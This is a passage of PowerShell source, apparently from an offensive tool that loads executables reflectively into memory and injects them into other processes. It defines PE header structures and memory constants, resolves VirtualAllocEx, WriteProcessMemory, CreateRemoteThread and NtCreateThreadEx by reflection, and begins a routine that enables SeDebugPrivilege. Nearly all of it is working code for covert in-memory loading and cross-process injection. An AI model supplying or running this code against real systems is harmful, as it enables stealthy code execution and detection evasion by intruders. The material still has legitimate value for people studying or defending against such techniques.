'Public') | Out-Null\n        $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null\n        $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType()\n        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER\n\n        #Struct IMAGE_BASE_RELOCATION\n        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8)\n        $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null\n        $IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType()\n        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION\n\n        #Struct IMAGE_IMPORT_DESCRIPTOR\n        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20)\n        $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null\n        $IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType()\n        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR\n\n        #Struct IMAGE_EXPORT_DIRECTORY\n        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40)\n        $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null\n        $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null\n        $IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType()\n        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY\n\n        #Struct LUID\n        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n        $TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8)\n        $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null\n        $LUID = $TypeBuilder.CreateType()\n        $Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID\n\n        #Struct LUID_AND_ATTRIBUTES\n        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n        $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12)\n        $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null\n        $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null\n        $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType()\n        $Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES\n\n        #Struct TOKEN_PRIVILEGES\n        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n        $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16)\n        $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null\n        $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null\n        $TOKEN_PRIVILEGES = $TypeBuilder.CreateType()\n        $Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES\n\n        return $Win32Types\n    }\n\n    Function Get-Win32Constants\n    {\n        $Win32Constants = New-Object System.Object\n\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2\n        $Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0\n\n        return $Win32Constants\n    }\n\n    Function Get-Win32Functions\n    {\n        $Win32Functions = New-Object System.Object\n\n        $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc\n        $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])\n        $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)\n        $Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc\n\n        $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx\n        $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])\n        $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate)\n        $Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value $VirtualAllocEx\n\n        $memcpyAddr = Get-ProcAddress msvcrt.dll memcpy\n        $memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr])\n        $memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate)\n        $Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy\n\n        $memsetAddr = Get-ProcAddress msvcrt.dll memset\n        $memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr])\n        $memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate)\n        $Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset\n\n        $LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA\n        $LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr])\n        $LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate)\n        $Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary\n\n        $GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress\n        $GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr])\n        $GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate)\n        $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress\n\n        $GetProcAddressIntPtrAddr = Get-ProcAddress kernel32.dll GetProcAddress #This is still GetProcAddress, but instead of PowerShell converting the string to a pointer, you must do it yourself\n        $GetProcAddressIntPtrDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([IntPtr])\n        $GetProcAddressIntPtr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressIntPtrAddr, $GetProcAddressIntPtrDelegate)\n        $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressIntPtr -Value $GetProcAddressIntPtr\n\n        $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree\n        $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool])\n        $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate)\n        $Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree\n\n        $VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx\n        $VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool])\n        $VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate)\n        $Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value $VirtualFreeEx\n\n        $VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect\n        $VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])\n        $VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate)\n        $Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect\n\n        $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA\n        $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr])\n        $GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate)\n        $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle\n\n        $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary\n        $FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool])\n        $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate)\n        $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary\n\n        $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess\n        $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])\n        $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)\n        $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value $OpenProcess\n\n        $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject\n        $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [UInt32]) ([UInt32])\n        $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)\n        $Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject\n\n        $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory\n        $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])\n        $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate)\n        $Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory\n\n        $ReadProcessMemoryAddr = Get-ProcAddress kernel32.dll ReadProcessMemory\n        $ReadProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])\n        $ReadProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReadProcessMemoryAddr, $ReadProcessMemoryDelegate)\n        $Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value $ReadProcessMemory\n\n        $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread\n        $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])\n        $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate)\n        $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value $CreateRemoteThread\n\n        $GetExitCodeThreadAddr = Get-ProcAddress kernel32.dll GetExitCodeThread\n        $GetExitCodeThreadDelegate = Get-DelegateType @([IntPtr], [Int32].MakeByRefType()) ([Bool])\n        $GetExitCodeThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetExitCodeThreadAddr, $GetExitCodeThreadDelegate)\n        $Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value $GetExitCodeThread\n\n        $OpenThreadTokenAddr = Get-ProcAddress Advapi32.dll OpenThreadToken\n        $OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool])\n        $OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate)\n        $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value $OpenThreadToken\n\n        $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread\n        $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr])\n        $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate)\n        $Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value $GetCurrentThread\n\n        $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges\n        $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) ([Bool])\n        $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate)\n        $Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value $AdjustTokenPrivileges\n\n        $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA\n        $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], [IntPtr]) ([Bool])\n        $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate)\n        $Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value $LookupPrivilegeValue\n\n        $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf\n        $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool])\n        $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate)\n        $Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf\n\n        # NtCreateThreadEx is only ever called on Vista and Win7. NtCreateThreadEx is not exported by ntdll.dll in Windows XP\n        if (([Environment]::OSVersion.Version -ge (New-Object 'Version' 6,0)) -and ([Environment]::OSVersion.Version -lt (New-Object 'Version' 6,2))) {\n            $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx\n            $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32])\n            $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate)\n            $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx\n        }\n\n        $IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process\n        $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])\n        $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate)\n        $Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value $IsWow64Process\n\n        $CreateThreadAddr = Get-ProcAddress Kernel32.dll CreateThread\n        $CreateThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr])\n        $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate)\n        $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value $CreateThread\n\n        return $Win32Functions\n    }\n    #####################################\n\n\n    #####################################\n    ###########    HELPERS   ############\n    #####################################\n\n    #Powershell only does signed arithmetic, so if we want to calculate memory addresses we have to use this function\n    #This will add signed integers as if they were unsigned integers so we can accurately calculate memory addresses\n    Function Sub-SignedIntAsUnsigned\n    {\n        Param(\n        [Parameter(Position = 0, Mandatory = $true)]\n        [Int64]\n        $Value1,\n\n        [Parameter(Position = 1, Mandatory = $true)]\n        [Int64]\n        $Value2\n        )\n\n        [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)\n        [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)\n        [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)\n\n        if ($Value1Bytes.Count -eq $Value2Bytes.Count)\n        {\n            $CarryOver = 0\n            for ($i = 0; $i -lt $Value1Bytes.Count; $i++)\n            {\n                $Val = $Value1Bytes[$i] - $CarryOver\n                #Sub bytes\n                if ($Val -lt $Value2Bytes[$i])\n                {\n                    $Val += 256\n                    $CarryOver = 1\n                }\n                else\n                {\n                    $CarryOver = 0\n                }\n\n                [UInt16]$Sum = $Val - $Value2Bytes[$i]\n\n                $FinalBytes[$i] = $Sum -band 0x00FF\n            }\n        }\n        else\n        {\n            Throw \"Cannot subtract bytearrays of different sizes\"\n        }\n\n        return [BitConverter]::ToInt64($FinalBytes, 0)\n    }\n\n    Function Add-SignedIntAsUnsigned\n    {\n        Param(\n        [Parameter(Position = 0, Mandatory = $true)]\n        [Int64]\n        $Value1,\n\n        [Parameter(Position = 1, Mandatory = $true)]\n        [Int64]\n        $Value2\n        )\n\n        [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)\n        [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)\n        [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)\n\n        if ($Value1Bytes.Count -eq $Value2Bytes.Count)\n        {\n            $CarryOver = 0\n            for ($i = 0; $i -lt $Value1Bytes.Count; $i++)\n            {\n                #Add bytes\n                [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver\n\n                $FinalBytes[$i] = $Sum -band 0x00FF\n\n                if (($Sum -band 0xFF00) -eq 0x100)\n                {\n                    $CarryOver = 1\n                }\n                else\n                {\n                    $CarryOver = 0\n                }\n            }\n        }\n        else\n        {\n            Throw \"Cannot add bytearrays of different sizes\"\n        }\n\n        return [BitConverter]::ToInt64($FinalBytes, 0)\n    }\n\n    Function Compare-Val1GreaterThanVal2AsUInt\n    {\n        Param(\n        [Parameter(Position = 0, Mandatory = $true)]\n        [Int64]\n        $Value1,\n\n        [Parameter(Position = 1, Mandatory = $true)]\n        [Int64]\n        $Value2\n        )\n\n        [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)\n        [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)\n\n        if ($Value1Bytes.Count -eq $Value2Bytes.Count)\n        {\n            for ($i = $Value1Bytes.Count-1; $i -ge 0; $i--)\n            {\n                if ($Value1Bytes[$i] -gt $Value2Bytes[$i])\n                {\n                    return $true\n                }\n                elseif ($Value1Bytes[$i] -lt $Value2Bytes[$i])\n                {\n                    return $false\n                }\n            }\n        }\n        else\n        {\n            Throw \"Cannot compare byte arrays of different size\"\n        }\n\n        return $false\n    }\n\n\n    Function Convert-UIntToInt\n    {\n        Param(\n        [Parameter(Position = 0, Mandatory = $true)]\n        [UInt64]\n        $Value\n        )\n\n        [Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value)\n        return ([BitConverter]::ToInt64($ValueBytes, 0))\n    }\n\n\n    Function Get-Hex\n    {\n        Param(\n        [Parameter(Position = 0, Mandatory = $true)]\n        $Value #We will determine the type dynamically\n        )\n\n        $ValueSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Value.GetType()) * 2\n        $Hex = \"0x{0:X$($ValueSize)}\" -f [Int64]$Value #Passing a IntPtr to this doesn't work well. Cast to Int64 first.\n\n        return $Hex\n    }\n\n    Function Test-MemoryRangeValid\n    {\n        Param(\n        [Parameter(Position = 0, Mandatory = $true)]\n        [String]\n        $DebugString,\n\n        [Parameter(Position = 1, Mandatory = $true)]\n        [System.Object]\n        $PEInfo,\n\n        [Parameter(Position = 2, Mandatory = $true)]\n        [IntPtr]\n        $StartAddress,\n\n        [Parameter(ParameterSetName = \"Size\", Position = 3, Mandatory = $true)]\n        [IntPtr]\n        $Size\n        )\n\n        [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))\n\n        $PEEndAddress = $PEInfo.EndAddress\n\n        if ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress)) -eq $true)\n        {\n            Throw \"Trying to write to memory smaller than allocated address range. $DebugString\"\n        }\n        if ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($PEEndAddress)) -eq $true)\n        {\n            Throw \"Trying to write to memory greater than allocated address range. $DebugString\"\n        }\n    }\n\n    Function Write-BytesToMemory\n    {\n        Param(\n            [Parameter(Position=0, Mandatory = $true)]\n            [Byte[]]\n            $Bytes,\n\n            [Parameter(Position=1, Mandatory = $true)]\n            [IntPtr]\n            $MemoryAddress\n        )\n\n        for ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++)\n        {\n            [System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset])\n        }\n    }\n\n    #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/\n    Function Get-DelegateType\n    {\n        Param\n        (\n            [OutputType([Type])]\n\n            [Parameter( Position = 0)]\n            [Type[]]\n            $Parameters = (New-Object Type[](0)),\n\n            [Parameter( Position = 1 )]\n            [Type]\n            $ReturnType = [Void]\n        )\n\n        $Domain = [AppDomain]::CurrentDomain\n        $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')\n        $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)\n        $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])\n        $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)\n        $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')\n        $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)\n        $MethodBuilder.SetImplementationFlags('Runtime, Managed')\n\n        Write-Output $TypeBuilder.CreateType()\n    }\n\n\n    #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/\n    Function Get-ProcAddress\n    {\n        Param\n        (\n            [OutputType([IntPtr])]\n\n            [Parameter( Position = 0, Mandatory = $True )]\n            [String]\n            $Module,\n\n            [Parameter( Position = 1, Mandatory = $True )]\n            [String]\n            $Procedure\n        )\n\n        # Get a reference to System.dll in the GAC\n        $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |\n            Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }\n        $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')\n        # Get a reference to the GetModuleHandle and GetProcAddress methods\n        $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')\n        $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')\n        # Get a handle to the module specified\n        $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))\n        $tmpPtr = New-Object IntPtr\n        $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)\n\n        # Return the address of the function\n        Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))\n    }\n\n    Function Enable-SeDebugPrivilege\n    {\n        Param(\n        [Parameter(Position = 1, Mandatory = $true)]\n        [System.Object]\n        $Win32Functions,\n\n        [Parameter(Position = 2, Mandatory = $true)]\n        [System.Object]\n        $Win32Types,\n\n        [Parameter(Position = 3, Mandatory = $true)]\n        [System.Object]\n        $Win32Constants\n        )\n\n        [IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke()\n        if ($ThreadHandle -eq [IntPtr]::Zero)\n        {\n            Throw \"Unable to get the handle to the current thread\"\n        }\n\n        [IntPtr]$ThreadToken = [IntPtr]::Zero\n        [Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n        if ($Result -eq $false)\n        {\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n         